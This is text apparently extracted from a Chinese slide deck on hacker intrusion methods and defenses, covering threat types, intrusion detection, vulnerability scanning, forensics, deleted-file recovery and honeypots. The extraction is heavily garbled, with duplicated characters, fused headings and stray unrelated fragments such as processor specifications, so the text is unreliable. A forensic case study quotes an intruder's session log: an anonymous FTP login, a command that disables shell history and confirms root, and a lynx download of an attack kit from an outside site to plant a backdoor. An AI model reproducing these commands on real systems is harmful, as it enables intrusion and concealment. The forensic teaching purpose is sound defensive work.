黑客入侵常用方法與防范措施

1、黑客入侵防范技術(shù)綜述黑客入侵防范技術(shù)綜述Global Opportunities622 Mbps +10 Gbps l基于 Motorola DragonBall 系列的處理器 68k核心：DragonBall 68328、EZ、VZ、 Super VZARM 核心：DragonBall MX1 網(wǎng)絡(luò)存在的安全威脅網(wǎng)絡(luò)存在的安全威脅網(wǎng)絡(luò)網(wǎng)絡(luò)內(nèi)部、外部泄密內(nèi)部、外部泄密拒絕服務(wù)攻擊拒絕服務(wù)攻擊邏輯炸彈邏輯炸彈特洛伊木馬特洛伊木馬黑客攻擊黑客攻擊計(jì)算機(jī)病毒計(jì)算機(jī)病毒信息丟失、信息丟失、篡改、銷毀篡改、銷毀后門、隱蔽通道后門、隱蔽通道蠕蟲蠕蟲 n 入侵系統(tǒng)類攻擊入侵系統(tǒng)類攻擊 1.信息竊聽信息竊聽

2、SnifferSniffer2. 口令攻擊口令攻擊 John3.漏洞攻擊漏洞攻擊 WIN/IIS、RPCn 緩沖區(qū)溢出攻擊緩沖區(qū)溢出攻擊 獲取獲取ROOTROOT口令口令n 欺騙類攻擊欺騙類攻擊n 拒絕服務(wù)攻擊拒絕服務(wù)攻擊 DDOSDDOS1.拒絕服務(wù)攻擊拒絕服務(wù)攻擊2.分布式拒絕服務(wù)攻擊分布式拒絕服務(wù)攻擊n 對(duì)防火墻等安全設(shè)備的攻擊對(duì)防火墻等安全設(shè)備的攻擊n 利用病毒攻擊利用病毒攻擊n 木馬程序攻擊木馬程序攻擊n 后門攻擊后門攻擊n 網(wǎng)絡(luò)安全防范體系圖網(wǎng)絡(luò)安全防范體系圖 InternetInternet路由器路由器管理管理平臺(tái)平臺(tái)安全監(jiān)控設(shè)備安全監(jiān)控設(shè)備防火墻防火墻IDSIDS防病毒防病毒服

3、務(wù)器服務(wù)器內(nèi)部網(wǎng)內(nèi)部網(wǎng)備份備份系統(tǒng)系統(tǒng)網(wǎng)絡(luò)隱患網(wǎng)絡(luò)隱患掃描系統(tǒng)掃描系統(tǒng)陷阱機(jī)陷阱機(jī)取證取證系統(tǒng)系統(tǒng)其它智能系統(tǒng)其它智能系統(tǒng) 廣域網(wǎng)的基本概念提供的兩類服務(wù)網(wǎng)絡(luò)隱患掃描網(wǎng)絡(luò)隱患掃描評(píng)估、評(píng)估、服務(wù)檢查、服務(wù)檢查、攻擊性測(cè)試、攻擊性測(cè)試、提交安全建議報(bào)告提交安全建議報(bào)告等功能等功能 網(wǎng)絡(luò)隱患掃描硬件產(chǎn)品化網(wǎng)絡(luò)隱患掃描硬件產(chǎn)品化 iTOP Net-Scanner網(wǎng)絡(luò)入侵檢測(cè)系統(tǒng)網(wǎng)絡(luò)入侵檢測(cè)系統(tǒng)IDS實(shí)時(shí)發(fā)現(xiàn)、實(shí)時(shí)發(fā)現(xiàn)、發(fā)布警報(bào)、發(fā)布警報(bào)、與防火墻與防火墻聯(lián)動(dòng)等功能聯(lián)動(dòng)等功能分布式IDS架構(gòu) 產(chǎn)品圖NIDS產(chǎn)品技術(shù)產(chǎn)品技術(shù)(一一)NIDS產(chǎn)品技術(shù)產(chǎn)品技術(shù)(二)參考對(duì)比表格NIDS技術(shù)體系結(jié)構(gòu)網(wǎng)絡(luò)入侵檢

4、測(cè)系統(tǒng)示意圖簡單網(wǎng)絡(luò)環(huán)境復(fù)雜網(wǎng)絡(luò)環(huán)境 安全產(chǎn)品的性能問題規(guī)則集 膨脹產(chǎn)品性能降低流量增加網(wǎng)絡(luò)入侵監(jiān)控系統(tǒng)網(wǎng)絡(luò)入侵監(jiān)控系統(tǒng)IMS指定指定IP、實(shí)時(shí)發(fā)現(xiàn)、實(shí)時(shí)發(fā)現(xiàn)、制止阻斷制止阻斷IP包的格式普通用戶普通用戶HUB/SWITCH普通用戶普通用戶HUB/SWITCHHUB路由器/網(wǎng)關(guān)監(jiān)控系統(tǒng)Internet網(wǎng)絡(luò)入侵取證系統(tǒng)網(wǎng)絡(luò)入侵取證系統(tǒng)nIFS國際計(jì)算機(jī)網(wǎng)絡(luò)安全技術(shù)交流國際計(jì)算機(jī)網(wǎng)絡(luò)安全技術(shù)交流FIRSTFIRST年會(huì)介紹年會(huì)介紹 近年近年FIRSTFIRST年會(huì)討論的熱點(diǎn)內(nèi)容年會(huì)討論的熱點(diǎn)內(nèi)容主要集中幾個(gè)方面主要集中幾個(gè)方面：近年近年FIRSTFIRST年會(huì)討論的熱點(diǎn)內(nèi)容年會(huì)討論的熱點(diǎn)內(nèi)容主要集

5、中幾個(gè)方面主要集中幾個(gè)方面：近年近年FIRSTFIRST年會(huì)討論的熱點(diǎn)內(nèi)容年會(huì)討論的熱點(diǎn)內(nèi)容主要集中幾個(gè)方面主要集中幾個(gè)方面：傳統(tǒng)防范工具的局限傳統(tǒng)防范工具的局限入侵取證取證取證( (Forensic)Forensic) 取證科學(xué)取證科學(xué)入侵取證技術(shù)動(dòng)態(tài)入侵取證技術(shù)動(dòng)態(tài)2121世紀(jì)的網(wǎng)絡(luò)安全管理與取證技術(shù)世紀(jì)的網(wǎng)絡(luò)安全管理與取證技術(shù) 13屆FIRST年會(huì)報(bào)告Guardent公司入侵取證模型入侵取證模型技技術(shù)術(shù)標(biāo)標(biāo)準(zhǔn)準(zhǔn)類類法律基準(zhǔn)法律基準(zhǔn)證據(jù)的法律和法規(guī)證據(jù)的法律和法規(guī)技術(shù)基準(zhǔn)技術(shù)基準(zhǔn)分分 析析 策策 略略技術(shù)解決方案技術(shù)解決方案法法律律標(biāo)標(biāo)準(zhǔn)準(zhǔn)類類（一）網(wǎng)絡(luò)入侵取證網(wǎng)絡(luò)取證的設(shè)計(jì)與有關(guān)步驟網(wǎng)絡(luò)

6、取證的設(shè)計(jì)與有關(guān)步驟網(wǎng)絡(luò)取證分析過程網(wǎng)絡(luò)取證分析過程系統(tǒng)信息分析模塊網(wǎng)絡(luò)數(shù)據(jù)分析模塊相關(guān)性分析模塊分析結(jié)果報(bào)表審計(jì)數(shù)據(jù)分析子模塊系統(tǒng)日志分析子模塊入侵分析子模塊還原分析子模塊統(tǒng)計(jì)分析子模塊取證機(jī)記錄系統(tǒng)信息網(wǎng)絡(luò)數(shù)據(jù)事件分析案例事件分析案例事件分析案例事件分析案例USER ftp331 Guest login ok, send your complete e-mail address as password.PASS mozillaunset HISTFILE;id;uname -a;uid=0(root) gid=0(root) groups=50(ftp)whereis lynxlynx:

7、/usr/bin/lynx /etc/lynx.cfg/usr/share/man/man1/lynx.1.gzTERM=linux“l(fā)ynx http:/james84.supereva.it/.1/kit.tgz事件分析案例（續(xù)）事件分析案例（續(xù)）n入侵來源：入侵來源：0（歐洲）n簡單描述：簡單描述：利用被取證機(jī)提供的FTP匿名服務(wù)，造成緩沖區(qū)溢出，入侵者已獲得root權(quán)限。n開始時(shí)間：開始時(shí)間：03/16/2002-10:44:22 結(jié)束時(shí)間：03/16/2002-11:08:33n詳細(xì)過程：詳細(xì)過程：u10:44 用戶FTP 匿名登錄，并用mozilla作為密碼，向

8、被取證機(jī)發(fā)送緩沖區(qū)溢出程序，并成功攻入獲得了root權(quán)限。u10:53 開始用lynx從網(wǎng)站 http:/james84.supereva.it/.1/kit.tgz下載程序。u11:08 下載完畢。在被取證機(jī)上安裝了后門。 （二）計(jì)算機(jī)取證文件被刪除后文件被刪除后UNIX/Linux文件系統(tǒng)文件系統(tǒng)directory /home/you inode 123data blocksdata blockdata blockdata block直接和間接數(shù)據(jù)塊直接和間接數(shù)據(jù)塊inodeblock 0block 111 indirect2 indirect3 indirectblock 12blk 2

9、0591 indirect1 indirect2 indirect2 indirectblk 206041963631 indirect1 indirectSpecific block number are typical for Berkeley FFS-like systems典型的UNIX/Linux磁盤布局label / swap /usr partition /home partition zone zone zone zone zone super inode data inode data block bitmap bitmap blocks blocks-Entire disk

10、-UNIX/Linux file systemFile system zone如果可能的話，文件的所有數(shù)據(jù)會(huì)放在同一區(qū)域內(nèi)文件被刪除后保留的信息directory /home/you inode 123data blocksdata blockdata blockdata block= UNIX+LINUX= LINUX only*zero references*status change time = time of deletion被刪除文件信息能存活很長時(shí)間被刪除文件信息能存活很長時(shí)間獲取被刪除文件信息的工具獲取被刪除文件信息的工具計(jì)算機(jī)取證計(jì)算機(jī)取證WINDOWS2000/XP 平臺(tái)平

11、臺(tái)NTFS 文件系統(tǒng)特性NTFS 文件磁盤結(jié)構(gòu)NTFS 中的元數(shù)據(jù)有用的功能有用的功能幾個(gè)恢復(fù)工具幾個(gè)恢復(fù)工具 Windows 2000/xp 中的系統(tǒng)日志文件用戶日志文件注冊(cè)表一些應(yīng)用文件格式典型foxmail郵件箱格式一些應(yīng)用程序緩沖一個(gè)取證系統(tǒng)的框架磁 盤 現(xiàn) 有 數(shù) 據(jù) 獲 取磁 盤 數(shù) 據(jù) 恢 復(fù)恢 復(fù) 數(shù) 據(jù) 整 理待 分 析 數(shù) 據(jù) 預(yù) 處 理系 統(tǒng) 元 數(shù) 據(jù) 分 析系 統(tǒng) 與 用 戶 日 志 分析用 戶 文 檔 分 析系 統(tǒng) 注 冊(cè) 表 分 析綜 合 分 析中科院高能所掌上操作系統(tǒng)設(shè)備的記憶成像掌上操作系統(tǒng)設(shè)備的記憶成像Joe GrandJoe Grand11:45am-12

12、: 30pm11:45am-12: 30pmJune 26, 2002-7-31 June 26, 2002-7-31 1414thth Annual FIRST Computer Annual FIRST Computer Security IncidentSecurity IncidentHanding ConferenceHanding Conference網(wǎng)絡(luò)入侵陷阱技術(shù)ITS陷阱機(jī)系統(tǒng)陷阱機(jī)系統(tǒng)系統(tǒng)內(nèi)核系統(tǒng)內(nèi)核陷阱機(jī)內(nèi)核套陷阱機(jī)內(nèi)核套陷阱機(jī)設(shè)置和日志陷阱機(jī)設(shè)置和日志陷阱陷阱Email陷阱陷阱Web陷阱陷阱FTP陷阱陷阱DNS網(wǎng)絡(luò)陷阱機(jī)網(wǎng)絡(luò)陷阱機(jī)網(wǎng)絡(luò)入侵誘騙網(wǎng)絡(luò)入侵誘騙陷阱主機(jī)InternetID